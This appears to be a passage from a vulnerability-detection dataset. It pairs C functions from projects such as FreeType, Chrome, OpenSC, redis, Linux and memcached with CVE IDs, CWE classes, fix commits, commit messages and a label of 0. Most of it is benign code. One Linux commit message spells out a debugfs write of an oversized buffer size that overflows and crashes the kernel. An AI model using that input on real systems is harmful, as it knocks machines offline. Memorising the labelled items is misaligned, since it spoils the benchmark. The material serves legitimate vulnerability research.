Theoretically, it should work more predictably now.
|
static int jpc_unk_dumpparms(jpc_ms_t *ms, FILE *out)
{
unsigned int i;
jpc_unk_t *unk = &ms->parms.unk;
for (i = 0; i < unk->len; ++i) {
fprintf(out, "%02x ", unk->data[i]);
}
return 0;
}
|
static int jpc_unk_dumpparms(jpc_ms_t *ms, FILE *out)
{
unsigned int i;
jpc_unk_t *unk = &ms->parms.unk;
for (i = 0; i < unk->len; ++i) {
fprintf(out, "%02x ", unk->data[i]);
}
return 0;
}
|
C
|
jasper
| 0 |
CVE-2014-9659
|
https://www.cvedetails.com/cve/CVE-2014-9659/
|
CWE-119
|
https://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=2cdc4562f873237f1c77d43540537c7a721d3fd8
|
2cdc4562f873237f1c77d43540537c7a721d3fd8
| null |
cf2_glyphpath_closeOpenPath( CF2_GlyphPath glyphpath )
{
if ( glyphpath->pathIsOpen )
{
/*
* A closing line in Character Space line is always generated below
* with `cf2_glyphPath_lineTo'. It may be ignored later if it turns
* out to be zero length in Device Space.
*/
glyphpath->pathIsClosing = TRUE;
cf2_glyphpath_lineTo( glyphpath,
glyphpath->start.x,
glyphpath->start.y );
/* empty the final element from the queue and close the path */
if ( glyphpath->elemIsQueued )
cf2_glyphpath_pushPrevElem( glyphpath,
&glyphpath->hintMap,
&glyphpath->offsetStart0,
glyphpath->offsetStart1,
TRUE );
/* reset state machine */
glyphpath->moveIsPending = TRUE;
glyphpath->pathIsOpen = FALSE;
glyphpath->pathIsClosing = FALSE;
glyphpath->elemIsQueued = FALSE;
}
}
|
cf2_glyphpath_closeOpenPath( CF2_GlyphPath glyphpath )
{
if ( glyphpath->pathIsOpen )
{
/*
* A closing line in Character Space line is always generated below
* with `cf2_glyphPath_lineTo'. It may be ignored later if it turns
* out to be zero length in Device Space.
*/
glyphpath->pathIsClosing = TRUE;
cf2_glyphpath_lineTo( glyphpath,
glyphpath->start.x,
glyphpath->start.y );
/* empty the final element from the queue and close the path */
if ( glyphpath->elemIsQueued )
cf2_glyphpath_pushPrevElem( glyphpath,
&glyphpath->hintMap,
&glyphpath->offsetStart0,
glyphpath->offsetStart1,
TRUE );
/* reset state machine */
glyphpath->moveIsPending = TRUE;
glyphpath->pathIsOpen = FALSE;
glyphpath->pathIsClosing = FALSE;
glyphpath->elemIsQueued = FALSE;
}
}
|
C
|
savannah
| 0 |
CVE-2016-1683
|
https://www.cvedetails.com/cve/CVE-2016-1683/
|
CWE-119
|
https://github.com/chromium/chromium/commit/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab
|
96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab
|
Roll libxslt to 891681e3e948f31732229f53cb6db7215f740fc7
BUG=583156,583171
Review URL: https://codereview.chromium.org/1853083002
Cr-Commit-Position: refs/heads/master@{#385338}
|
xsltCheckExtPrefix(xsltStylesheetPtr style, const xmlChar * URI)
{
#ifdef XSLT_REFACTORED
if ((style == NULL) || (style->compCtxt == NULL) ||
(XSLT_CCTXT(style)->inode == NULL) ||
(XSLT_CCTXT(style)->inode->extElemNs == NULL))
return (0);
/*
* Lookup the extension namespaces registered
* at the current node in the stylesheet's tree.
*/
if (XSLT_CCTXT(style)->inode->extElemNs != NULL) {
int i;
xsltPointerListPtr list = XSLT_CCTXT(style)->inode->extElemNs;
for (i = 0; i < list->number; i++) {
if (xmlStrEqual((const xmlChar *) list->items[i],
URI))
{
return(1);
}
}
}
#else
xsltExtDefPtr cur;
if ((style == NULL) || (style->nsDefs == NULL))
return (0);
if (URI == NULL)
URI = BAD_CAST "#default";
cur = (xsltExtDefPtr) style->nsDefs;
while (cur != NULL) {
/*
* NOTE: This was change to work on namespace names rather
* than namespace prefixes. This fixes bug #339583.
* TODO: Consider renaming the field "prefix" of xsltExtDef
* to "href".
*/
if (xmlStrEqual(URI, cur->prefix))
return (1);
cur = cur->next;
}
#endif
return (0);
}
|
xsltCheckExtPrefix(xsltStylesheetPtr style, const xmlChar * URI)
{
#ifdef XSLT_REFACTORED
if ((style == NULL) || (style->compCtxt == NULL) ||
(XSLT_CCTXT(style)->inode == NULL) ||
(XSLT_CCTXT(style)->inode->extElemNs == NULL))
return (0);
/*
* Lookup the extension namespaces registered
* at the current node in the stylesheet's tree.
*/
if (XSLT_CCTXT(style)->inode->extElemNs != NULL) {
int i;
xsltPointerListPtr list = XSLT_CCTXT(style)->inode->extElemNs;
for (i = 0; i < list->number; i++) {
if (xmlStrEqual((const xmlChar *) list->items[i],
URI))
{
return(1);
}
}
}
#else
xsltExtDefPtr cur;
if ((style == NULL) || (style->nsDefs == NULL))
return (0);
if (URI == NULL)
URI = BAD_CAST "#default";
cur = (xsltExtDefPtr) style->nsDefs;
while (cur != NULL) {
/*
* NOTE: This was change to work on namespace names rather
* than namespace prefixes. This fixes bug #339583.
* TODO: Consider renaming the field "prefix" of xsltExtDef
* to "href".
*/
if (xmlStrEqual(URI, cur->prefix))
return (1);
cur = cur->next;
}
#endif
return (0);
}
|
C
|
Chrome
| 0 |
CVE-2018-16427
|
https://www.cvedetails.com/cve/CVE-2018-16427/
|
CWE-125
|
https://github.com/OpenSC/OpenSC/pull/1447/commits/8fe377e93b4b56060e5bbfb6f3142ceaeca744fa
|
8fe377e93b4b56060e5bbfb6f3142ceaeca744fa
|
fixed out of bounds reads
Thanks to Eric Sesterhenn from X41 D-SEC GmbH
for reporting and suggesting security fixes.
|
gpk_hash(sc_card_t *card, const u8 *data, size_t datalen)
{
sc_apdu_t apdu;
unsigned int count, chain, len;
int r;
chain = 0x01;
for (count = 0; count < datalen; count += len) {
unsigned char buffer[GPK_HASH_CHUNK+2];
if ((len = datalen - count) > GPK_HASH_CHUNK)
len = GPK_HASH_CHUNK;
else
chain |= 0x10;
buffer[0] = 0x55;
buffer[1] = len;
memcpy(buffer+2, data + count, len);
memset(&apdu, 0, sizeof(apdu));
apdu.cse = SC_APDU_CASE_3_SHORT;
apdu.cla = 0x80;
apdu.ins = 0xDA;
apdu.p1 = chain;
apdu.p2 = len;
apdu.lc = len + 2;
apdu.data= buffer;
apdu.datalen = len + 2;
r = sc_transmit_apdu(card, &apdu);
SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed");
r = sc_check_sw(card, apdu.sw1, apdu.sw2);
SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "Card returned error");
chain = 0;
}
return 0;
}
|
gpk_hash(sc_card_t *card, const u8 *data, size_t datalen)
{
sc_apdu_t apdu;
unsigned int count, chain, len;
int r;
chain = 0x01;
for (count = 0; count < datalen; count += len) {
unsigned char buffer[GPK_HASH_CHUNK+2];
if ((len = datalen - count) > GPK_HASH_CHUNK)
len = GPK_HASH_CHUNK;
else
chain |= 0x10;
buffer[0] = 0x55;
buffer[1] = len;
memcpy(buffer+2, data + count, len);
memset(&apdu, 0, sizeof(apdu));
apdu.cse = SC_APDU_CASE_3_SHORT;
apdu.cla = 0x80;
apdu.ins = 0xDA;
apdu.p1 = chain;
apdu.p2 = len;
apdu.lc = len + 2;
apdu.data= buffer;
apdu.datalen = len + 2;
r = sc_transmit_apdu(card, &apdu);
SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed");
r = sc_check_sw(card, apdu.sw1, apdu.sw2);
SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "Card returned error");
chain = 0;
}
return 0;
}
|
C
|
OpenSC
| 0 |
CVE-2018-11218
|
https://www.cvedetails.com/cve/CVE-2018-11218/
|
CWE-119
|
https://github.com/antirez/redis/commit/5ccb6f7a791bf3490357b00a898885759d98bab0
|
5ccb6f7a791bf3490357b00a898885759d98bab0
|
Security: more cmsgpack fixes by @soloestoy.
@soloestoy sent me this additional fixes, after searching for similar
problems to the one reported in mp_pack(). I'm committing the changes
because it was not possible during to make a public PR to protect Redis
users and give Redis providers some time to patch their systems.
|
void mp_encode_lua_bool(lua_State *L, mp_buf *buf) {
unsigned char b = lua_toboolean(L,-1) ? 0xc3 : 0xc2;
mp_buf_append(L,buf,&b,1);
}
|
void mp_encode_lua_bool(lua_State *L, mp_buf *buf) {
unsigned char b = lua_toboolean(L,-1) ? 0xc3 : 0xc2;
mp_buf_append(L,buf,&b,1);
}
|
C
|
redis
| 0 |
CVE-2016-9754
|
https://www.cvedetails.com/cve/CVE-2016-9754/
|
CWE-190
|
https://github.com/torvalds/linux/commit/59643d1535eb220668692a5359de22545af579f6
|
59643d1535eb220668692a5359de22545af579f6
|
ring-buffer: Prevent overflow of size in ring_buffer_resize()
If the size passed to ring_buffer_resize() is greater than MAX_LONG - BUF_PAGE_SIZE
then the DIV_ROUND_UP() will return zero.
Here's the details:
# echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb
tracing_entries_write() processes this and converts kb to bytes.
18014398509481980 << 10 = 18446744073709547520
and this is passed to ring_buffer_resize() as unsigned long size.
size = DIV_ROUND_UP(size, BUF_PAGE_SIZE);
Where DIV_ROUND_UP(a, b) is (a + b - 1)/b
BUF_PAGE_SIZE is 4080 and here
18446744073709547520 + 4080 - 1 = 18446744073709551599
where 18446744073709551599 is still smaller than 2^64
2^64 - 18446744073709551599 = 17
But now 18446744073709551599 / 4080 = 4521260802379792
and size = size * 4080 = 18446744073709551360
This is checked to make sure its still greater than 2 * 4080,
which it is.
Then we convert to the number of buffer pages needed.
nr_page = DIV_ROUND_UP(size, BUF_PAGE_SIZE)
but this time size is 18446744073709551360 and
2^64 - (18446744073709551360 + 4080 - 1) = -3823
Thus it overflows and the resulting number is less than 4080, which makes
3823 / 4080 = 0
an nr_pages is set to this. As we already checked against the minimum that
nr_pages may be, this causes the logic to fail as well, and we crash the
kernel.
There's no reason to have the two DIV_ROUND_UP() (that's just result of
historical code changes), clean up the code and fix this bug.
Cc: stable@vger.kernel.org # 3.5+
Fixes: 83f40318dab00 ("ring-buffer: Make removal of ring buffer pages atomic")
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
|
int ring_buffer_write(struct ring_buffer *buffer,
unsigned long length,
void *data)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_event *event;
void *body;
int ret = -EBUSY;
int cpu;
preempt_disable_notrace();
if (atomic_read(&buffer->record_disabled))
goto out;
cpu = raw_smp_processor_id();
if (!cpumask_test_cpu(cpu, buffer->cpumask))
goto out;
cpu_buffer = buffer->buffers[cpu];
if (atomic_read(&cpu_buffer->record_disabled))
goto out;
if (length > BUF_MAX_DATA_SIZE)
goto out;
if (unlikely(trace_recursive_lock(cpu_buffer)))
goto out;
event = rb_reserve_next_event(buffer, cpu_buffer, length);
if (!event)
goto out_unlock;
body = rb_event_data(event);
memcpy(body, data, length);
rb_commit(cpu_buffer, event);
rb_wakeups(buffer, cpu_buffer);
ret = 0;
out_unlock:
trace_recursive_unlock(cpu_buffer);
out:
preempt_enable_notrace();
return ret;
}
|
int ring_buffer_write(struct ring_buffer *buffer,
unsigned long length,
void *data)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_event *event;
void *body;
int ret = -EBUSY;
int cpu;
preempt_disable_notrace();
if (atomic_read(&buffer->record_disabled))
goto out;
cpu = raw_smp_processor_id();
if (!cpumask_test_cpu(cpu, buffer->cpumask))
goto out;
cpu_buffer = buffer->buffers[cpu];
if (atomic_read(&cpu_buffer->record_disabled))
goto out;
if (length > BUF_MAX_DATA_SIZE)
goto out;
if (unlikely(trace_recursive_lock(cpu_buffer)))
goto out;
event = rb_reserve_next_event(buffer, cpu_buffer, length);
if (!event)
goto out_unlock;
body = rb_event_data(event);
memcpy(body, data, length);
rb_commit(cpu_buffer, event);
rb_wakeups(buffer, cpu_buffer);
ret = 0;
out_unlock:
trace_recursive_unlock(cpu_buffer);
out:
preempt_enable_notrace();
return ret;
}
|
C
|
linux
| 0 |
CVE-2011-4930
|
https://www.cvedetails.com/cve/CVE-2011-4930/
|
CWE-134
|
https://htcondor-git.cs.wisc.edu/?p=condor.git;a=commitdiff;h=5e5571d1a431eb3c61977b6dd6ec90186ef79867
|
5e5571d1a431eb3c61977b6dd6ec90186ef79867
| null |
const char * SafeSock :: isIncomingDataMD5ed()
{
char c;
if (!peek(c)) {
return 0;
}
else {
if(_longMsg) {
return _longMsg->isDataMD5ed();
}
else { // short message
return _shortMsg.isDataMD5ed();
}
}
}
|
const char * SafeSock :: isIncomingDataMD5ed()
{
char c;
if (!peek(c)) {
return 0;
}
else {
if(_longMsg) {
return _longMsg->isDataMD5ed();
}
else { // short message
return _shortMsg.isDataMD5ed();
}
}
}
|
CPP
|
htcondor
| 0 |
CVE-2017-5120
|
https://www.cvedetails.com/cve/CVE-2017-5120/
| null |
https://github.com/chromium/chromium/commit/b7277af490d28ac7f802c015bb0ff31395768556
|
b7277af490d28ac7f802c015bb0ff31395768556
|
bindings: Support "attribute FrozenArray<T>?"
Adds a quick hack to support a case of "attribute FrozenArray<T>?".
Bug: 1028047
Change-Id: Ib3cecc4beb6bcc0fb0dbc667aca595454cc90c86
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1933866
Reviewed-by: Hitoshi Yoshida <peria@chromium.org>
Commit-Queue: Yuki Shiino <yukishiino@chromium.org>
Cr-Commit-Position: refs/heads/master@{#718676}
|
void V8TestObject::LocationPutForwardsAttributeGetterCallback(const v8::FunctionCallbackInfo<v8::Value>& info) {
RUNTIME_CALL_TIMER_SCOPE_DISABLED_BY_DEFAULT(info.GetIsolate(), "Blink_TestObject_locationPutForwards_Getter");
test_object_v8_internal::LocationPutForwardsAttributeGetter(info);
}
|
void V8TestObject::LocationPutForwardsAttributeGetterCallback(const v8::FunctionCallbackInfo<v8::Value>& info) {
RUNTIME_CALL_TIMER_SCOPE_DISABLED_BY_DEFAULT(info.GetIsolate(), "Blink_TestObject_locationPutForwards_Getter");
test_object_v8_internal::LocationPutForwardsAttributeGetter(info);
}
|
C
|
Chrome
| 0 |
CVE-2011-4112
|
https://www.cvedetails.com/cve/CVE-2011-4112/
|
CWE-264
|
https://github.com/torvalds/linux/commit/550fd08c2cebad61c548def135f67aba284c6162
|
550fd08c2cebad61c548def135f67aba284c6162
|
net: Audit drivers to identify those needing IFF_TX_SKB_SHARING cleared
After the last patch, We are left in a state in which only drivers calling
ether_setup have IFF_TX_SKB_SHARING set (we assume that drivers touching real
hardware call ether_setup for their net_devices and don't hold any state in
their skbs. There are a handful of drivers that violate this assumption of
course, and need to be fixed up. This patch identifies those drivers, and marks
them as not being able to support the safe transmission of skbs by clearning the
IFF_TX_SKB_SHARING flag in priv_flags
Signed-off-by: Neil Horman <nhorman@tuxdriver.com>
CC: Karsten Keil <isdn@linux-pingi.de>
CC: "David S. Miller" <davem@davemloft.net>
CC: Jay Vosburgh <fubar@us.ibm.com>
CC: Andy Gospodarek <andy@greyhouse.net>
CC: Patrick McHardy <kaber@trash.net>
CC: Krzysztof Halasa <khc@pm.waw.pl>
CC: "John W. Linville" <linville@tuxdriver.com>
CC: Greg Kroah-Hartman <gregkh@suse.de>
CC: Marcel Holtmann <marcel@holtmann.org>
CC: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
|
isdn_net_getcfg(isdn_net_ioctl_cfg * cfg)
{
isdn_net_dev *p = isdn_net_findif(cfg->name);
if (p) {
isdn_net_local *lp = p->local;
strcpy(cfg->eaz, lp->msn);
cfg->exclusive = lp->exclusive;
if (lp->pre_device >= 0) {
sprintf(cfg->drvid, "%s,%d", dev->drvid[lp->pre_device],
lp->pre_channel);
} else
cfg->drvid[0] = '\0';
cfg->onhtime = lp->onhtime;
cfg->charge = lp->charge;
cfg->l2_proto = lp->l2_proto;
cfg->l3_proto = lp->l3_proto;
cfg->p_encap = lp->p_encap;
cfg->secure = (lp->flags & ISDN_NET_SECURE) ? 1 : 0;
cfg->callback = 0;
if (lp->flags & ISDN_NET_CALLBACK)
cfg->callback = 1;
if (lp->flags & ISDN_NET_CBOUT)
cfg->callback = 2;
cfg->cbhup = (lp->flags & ISDN_NET_CBHUP) ? 1 : 0;
cfg->dialmode = lp->flags & ISDN_NET_DIALMODE_MASK;
cfg->chargehup = (lp->hupflags & 4) ? 1 : 0;
cfg->ihup = (lp->hupflags & 8) ? 1 : 0;
cfg->cbdelay = lp->cbdelay;
cfg->dialmax = lp->dialmax;
cfg->triggercps = lp->triggercps;
cfg->slavedelay = lp->slavedelay / HZ;
cfg->chargeint = (lp->hupflags & ISDN_CHARGEHUP) ?
(lp->chargeint / HZ) : 0;
cfg->pppbind = lp->pppbind;
cfg->dialtimeout = lp->dialtimeout >= 0 ? lp->dialtimeout / HZ : -1;
cfg->dialwait = lp->dialwait / HZ;
if (lp->slave) {
if (strlen(lp->slave->name) >= 10)
strcpy(cfg->slave, "too-long");
else
strcpy(cfg->slave, lp->slave->name);
} else
cfg->slave[0] = '\0';
if (lp->master) {
if (strlen(lp->master->name) >= 10)
strcpy(cfg->master, "too-long");
else
strcpy(cfg->master, lp->master->name);
} else
cfg->master[0] = '\0';
return 0;
}
return -ENODEV;
}
|
isdn_net_getcfg(isdn_net_ioctl_cfg * cfg)
{
isdn_net_dev *p = isdn_net_findif(cfg->name);
if (p) {
isdn_net_local *lp = p->local;
strcpy(cfg->eaz, lp->msn);
cfg->exclusive = lp->exclusive;
if (lp->pre_device >= 0) {
sprintf(cfg->drvid, "%s,%d", dev->drvid[lp->pre_device],
lp->pre_channel);
} else
cfg->drvid[0] = '\0';
cfg->onhtime = lp->onhtime;
cfg->charge = lp->charge;
cfg->l2_proto = lp->l2_proto;
cfg->l3_proto = lp->l3_proto;
cfg->p_encap = lp->p_encap;
cfg->secure = (lp->flags & ISDN_NET_SECURE) ? 1 : 0;
cfg->callback = 0;
if (lp->flags & ISDN_NET_CALLBACK)
cfg->callback = 1;
if (lp->flags & ISDN_NET_CBOUT)
cfg->callback = 2;
cfg->cbhup = (lp->flags & ISDN_NET_CBHUP) ? 1 : 0;
cfg->dialmode = lp->flags & ISDN_NET_DIALMODE_MASK;
cfg->chargehup = (lp->hupflags & 4) ? 1 : 0;
cfg->ihup = (lp->hupflags & 8) ? 1 : 0;
cfg->cbdelay = lp->cbdelay;
cfg->dialmax = lp->dialmax;
cfg->triggercps = lp->triggercps;
cfg->slavedelay = lp->slavedelay / HZ;
cfg->chargeint = (lp->hupflags & ISDN_CHARGEHUP) ?
(lp->chargeint / HZ) : 0;
cfg->pppbind = lp->pppbind;
cfg->dialtimeout = lp->dialtimeout >= 0 ? lp->dialtimeout / HZ : -1;
cfg->dialwait = lp->dialwait / HZ;
if (lp->slave) {
if (strlen(lp->slave->name) >= 10)
strcpy(cfg->slave, "too-long");
else
strcpy(cfg->slave, lp->slave->name);
} else
cfg->slave[0] = '\0';
if (lp->master) {
if (strlen(lp->master->name) >= 10)
strcpy(cfg->master, "too-long");
else
strcpy(cfg->master, lp->master->name);
} else
cfg->master[0] = '\0';
return 0;
}
return -ENODEV;
}
|
C
|
linux
| 0 |
CVE-2016-6836
|
https://www.cvedetails.com/cve/CVE-2016-6836/
|
CWE-200
|
https://git.qemu.org/?p=qemu.git;a=commit;h=fdda170e50b8af062cf5741e12c4fb5e57a2eacf
|
fdda170e50b8af062cf5741e12c4fb5e57a2eacf
| null |
vmxnet3_is_registered_vlan(VMXNET3State *s, const void *data)
{
uint16_t vlan_tag = eth_get_pkt_tci(data) & VLAN_VID_MASK;
if (IS_SPECIAL_VLAN_ID(vlan_tag)) {
return true;
}
return VMXNET3_VFTABLE_ENTRY_IS_SET(s->vlan_table, vlan_tag);
}
|
vmxnet3_is_registered_vlan(VMXNET3State *s, const void *data)
{
uint16_t vlan_tag = eth_get_pkt_tci(data) & VLAN_VID_MASK;
if (IS_SPECIAL_VLAN_ID(vlan_tag)) {
return true;
}
return VMXNET3_VFTABLE_ENTRY_IS_SET(s->vlan_table, vlan_tag);
}
|
C
|
qemu
| 0 |
CVE-2010-1152
|
https://www.cvedetails.com/cve/CVE-2010-1152/
|
CWE-20
|
https://github.com/memcached/memcached/commit/d9cd01ede97f4145af9781d448c62a3318952719
|
d9cd01ede97f4145af9781d448c62a3318952719
|
Use strncmp when checking for large ascii multigets.
|
static void process_stat_settings(ADD_STAT add_stats, void *c) {
assert(add_stats);
APPEND_STAT("maxbytes", "%u", (unsigned int)settings.maxbytes);
APPEND_STAT("maxconns", "%d", settings.maxconns);
APPEND_STAT("tcpport", "%d", settings.port);
APPEND_STAT("udpport", "%d", settings.udpport);
APPEND_STAT("inter", "%s", settings.inter ? settings.inter : "NULL");
APPEND_STAT("verbosity", "%d", settings.verbose);
APPEND_STAT("oldest", "%lu", (unsigned long)settings.oldest_live);
APPEND_STAT("evictions", "%s", settings.evict_to_free ? "on" : "off");
APPEND_STAT("domain_socket", "%s",
settings.socketpath ? settings.socketpath : "NULL");
APPEND_STAT("umask", "%o", settings.access);
APPEND_STAT("growth_factor", "%.2f", settings.factor);
APPEND_STAT("chunk_size", "%d", settings.chunk_size);
APPEND_STAT("num_threads", "%d", settings.num_threads);
APPEND_STAT("stat_key_prefix", "%c", settings.prefix_delimiter);
APPEND_STAT("detail_enabled", "%s",
settings.detail_enabled ? "yes" : "no");
APPEND_STAT("reqs_per_event", "%d", settings.reqs_per_event);
APPEND_STAT("cas_enabled", "%s", settings.use_cas ? "yes" : "no");
APPEND_STAT("tcp_backlog", "%d", settings.backlog);
APPEND_STAT("binding_protocol", "%s",
prot_text(settings.binding_protocol));
APPEND_STAT("item_size_max", "%d", settings.item_size_max);
}
|
static void process_stat_settings(ADD_STAT add_stats, void *c) {
assert(add_stats);
APPEND_STAT("maxbytes", "%u", (unsigned int)settings.maxbytes);
APPEND_STAT("maxconns", "%d", settings.maxconns);
APPEND_STAT("tcpport", "%d", settings.port);
APPEND_STAT("udpport", "%d", settings.udpport);
APPEND_STAT("inter", "%s", settings.inter ? settings.inter : "NULL");
APPEND_STAT("verbosity", "%d", settings.verbose);
APPEND_STAT("oldest", "%lu", (unsigned long)settings.oldest_live);
APPEND_STAT("evictions", "%s", settings.evict_to_free ? "on" : "off");
APPEND_STAT("domain_socket", "%s",
settings.socketpath ? settings.socketpath : "NULL");
APPEND_STAT("umask", "%o", settings.access);
APPEND_STAT("growth_factor", "%.2f", settings.factor);
APPEND_STAT("chunk_size", "%d", settings.chunk_size);
APPEND_STAT("num_threads", "%d", settings.num_threads);
APPEND_STAT("stat_key_prefix", "%c", settings.prefix_delimiter);
APPEND_STAT("detail_enabled", "%s",
settings.detail_enabled ? "yes" : "no");
APPEND_STAT("reqs_per_event", "%d", settings.reqs_per_event);
APPEND_STAT("cas_enabled", "%s", settings.use_cas ? "yes" : "no");
APPEND_STAT("tcp_backlog", "%d", settings.backlog);
APPEND_STAT("binding_protocol", "%s",
prot_text(settings.binding_protocol));
APPEND_STAT("item_size_max", "%d", settings.item_size_max);
}
|
C
|
memcached
| 0 |
CVE-2014-2672
|
https://www.cvedetails.com/cve/CVE-2014-2672/
|
CWE-362
|
https://github.com/torvalds/linux/commit/21f8aaee0c62708654988ce092838aa7df4d25d8
|
21f8aaee0c62708654988ce092838aa7df4d25d8
|
ath9k: protect tid->sched check
We check tid->sched without a lock taken on ath_tx_aggr_sleep(). That
is race condition which can result of doing list_del(&tid->list) twice
(second time with poisoned list node) and cause crash like shown below:
[424271.637220] BUG: unable to handle kernel paging request at 00100104
[424271.637328] IP: [<f90fc072>] ath_tx_aggr_sleep+0x62/0xe0 [ath9k]
...
[424271.639953] Call Trace:
[424271.639998] [<f90f6900>] ? ath9k_get_survey+0x110/0x110 [ath9k]
[424271.640083] [<f90f6942>] ath9k_sta_notify+0x42/0x50 [ath9k]
[424271.640177] [<f809cfef>] sta_ps_start+0x8f/0x1c0 [mac80211]
[424271.640258] [<c10f730e>] ? free_compound_page+0x2e/0x40
[424271.640346] [<f809e915>] ieee80211_rx_handlers+0x9d5/0x2340 [mac80211]
[424271.640437] [<c112f048>] ? kmem_cache_free+0x1d8/0x1f0
[424271.640510] [<c1345a84>] ? kfree_skbmem+0x34/0x90
[424271.640578] [<c10fc23c>] ? put_page+0x2c/0x40
[424271.640640] [<c1345a84>] ? kfree_skbmem+0x34/0x90
[424271.640706] [<c1345a84>] ? kfree_skbmem+0x34/0x90
[424271.640787] [<f809dde3>] ? ieee80211_rx_handlers_result+0x73/0x1d0 [mac80211]
[424271.640897] [<f80a07a0>] ieee80211_prepare_and_rx_handle+0x520/0xad0 [mac80211]
[424271.641009] [<f809e22d>] ? ieee80211_rx_handlers+0x2ed/0x2340 [mac80211]
[424271.641104] [<c13846ce>] ? ip_output+0x7e/0xd0
[424271.641182] [<f80a1057>] ieee80211_rx+0x307/0x7c0 [mac80211]
[424271.641266] [<f90fa6ee>] ath_rx_tasklet+0x88e/0xf70 [ath9k]
[424271.641358] [<f80a0f2c>] ? ieee80211_rx+0x1dc/0x7c0 [mac80211]
[424271.641445] [<f90f82db>] ath9k_tasklet+0xcb/0x130 [ath9k]
Bug report:
https://bugzilla.kernel.org/show_bug.cgi?id=70551
Reported-and-tested-by: Max Sydorenko <maxim.stargazer@gmail.com>
Cc: stable@vger.kernel.org
Signed-off-by: Stanislaw Gruszka <sgruszka@redhat.com>
Signed-off-by: John W. Linville <linville@tuxdriver.com>
|
void ath_tx_cabq(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
struct sk_buff *skb)
{
struct ath_softc *sc = hw->priv;
struct ath_tx_control txctl = {
.txq = sc->beacon.cabq
};
struct ath_tx_info info = {};
struct ieee80211_hdr *hdr;
struct ath_buf *bf_tail = NULL;
struct ath_buf *bf;
LIST_HEAD(bf_q);
int duration = 0;
int max_duration;
max_duration =
sc->cur_beacon_conf.beacon_interval * 1000 *
sc->cur_beacon_conf.dtim_period / ATH_BCBUF;
do {
struct ath_frame_info *fi = get_frame_info(skb);
if (ath_tx_prepare(hw, skb, &txctl))
break;
bf = ath_tx_setup_buffer(sc, txctl.txq, NULL, skb);
if (!bf)
break;
bf->bf_lastbf = bf;
ath_set_rates(vif, NULL, bf);
ath_buf_set_rate(sc, bf, &info, fi->framelen, false);
duration += info.rates[0].PktDuration;
if (bf_tail)
bf_tail->bf_next = bf;
list_add_tail(&bf->list, &bf_q);
bf_tail = bf;
skb = NULL;
if (duration > max_duration)
break;
skb = ieee80211_get_buffered_bc(hw, vif);
} while(skb);
if (skb)
ieee80211_free_txskb(hw, skb);
if (list_empty(&bf_q))
return;
bf = list_first_entry(&bf_q, struct ath_buf, list);
hdr = (struct ieee80211_hdr *) bf->bf_mpdu->data;
if (hdr->frame_control & IEEE80211_FCTL_MOREDATA) {
hdr->frame_control &= ~IEEE80211_FCTL_MOREDATA;
dma_sync_single_for_device(sc->dev, bf->bf_buf_addr,
sizeof(*hdr), DMA_TO_DEVICE);
}
ath_txq_lock(sc, txctl.txq);
ath_tx_fill_desc(sc, bf, txctl.txq, 0);
ath_tx_txqaddbuf(sc, txctl.txq, &bf_q, false);
TX_STAT_INC(txctl.txq->axq_qnum, queued);
ath_txq_unlock(sc, txctl.txq);
}
|
void ath_tx_cabq(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
struct sk_buff *skb)
{
struct ath_softc *sc = hw->priv;
struct ath_tx_control txctl = {
.txq = sc->beacon.cabq
};
struct ath_tx_info info = {};
struct ieee80211_hdr *hdr;
struct ath_buf *bf_tail = NULL;
struct ath_buf *bf;
LIST_HEAD(bf_q);
int duration = 0;
int max_duration;
max_duration =
sc->cur_beacon_conf.beacon_interval * 1000 *
sc->cur_beacon_conf.dtim_period / ATH_BCBUF;
do {
struct ath_frame_info *fi = get_frame_info(skb);
if (ath_tx_prepare(hw, skb, &txctl))
break;
bf = ath_tx_setup_buffer(sc, txctl.txq, NULL, skb);
if (!bf)
break;
bf->bf_lastbf = bf;
ath_set_rates(vif, NULL, bf);
ath_buf_set_rate(sc, bf, &info, fi->framelen, false);
duration += info.rates[0].PktDuration;
if (bf_tail)
bf_tail->bf_next = bf;
list_add_tail(&bf->list, &bf_q);
bf_tail = bf;
skb = NULL;
if (duration > max_duration)
break;
skb = ieee80211_get_buffered_bc(hw, vif);
} while(skb);
if (skb)
ieee80211_free_txskb(hw, skb);
if (list_empty(&bf_q))
return;
bf = list_first_entry(&bf_q, struct ath_buf, list);
hdr = (struct ieee80211_hdr *) bf->bf_mpdu->data;
if (hdr->frame_control & IEEE80211_FCTL_MOREDATA) {
hdr->frame_control &= ~IEEE80211_FCTL_MOREDATA;
dma_sync_single_for_device(sc->dev, bf->bf_buf_addr,
sizeof(*hdr), DMA_TO_DEVICE);
}
ath_txq_lock(sc, txctl.txq);
ath_tx_fill_desc(sc, bf, txctl.txq, 0);
ath_tx_txqaddbuf(sc, txctl.txq, &bf_q, false);
TX_STAT_INC(txctl.txq->axq_qnum, queued);
ath_txq_unlock(sc, txctl.txq);
}
|
C
|
linux
| 0 |
CVE-2017-9059
|
https://www.cvedetails.com/cve/CVE-2017-9059/
|
CWE-404
|
https://github.com/torvalds/linux/commit/c70422f760c120480fee4de6c38804c72aa26bc1
|
c70422f760c120480fee4de6c38804c72aa26bc1
|
Merge tag 'nfsd-4.12' of git://linux-nfs.org/~bfields/linux
Pull nfsd updates from Bruce Fields:
"Another RDMA update from Chuck Lever, and a bunch of miscellaneous
bugfixes"
* tag 'nfsd-4.12' of git://linux-nfs.org/~bfields/linux: (26 commits)
nfsd: Fix up the "supattr_exclcreat" attributes
nfsd: encoders mustn't use unitialized values in error cases
nfsd: fix undefined behavior in nfsd4_layout_verify
lockd: fix lockd shutdown race
NFSv4: Fix callback server shutdown
SUNRPC: Refactor svc_set_num_threads()
NFSv4.x/callback: Create the callback service through svc_create_pooled
lockd: remove redundant check on block
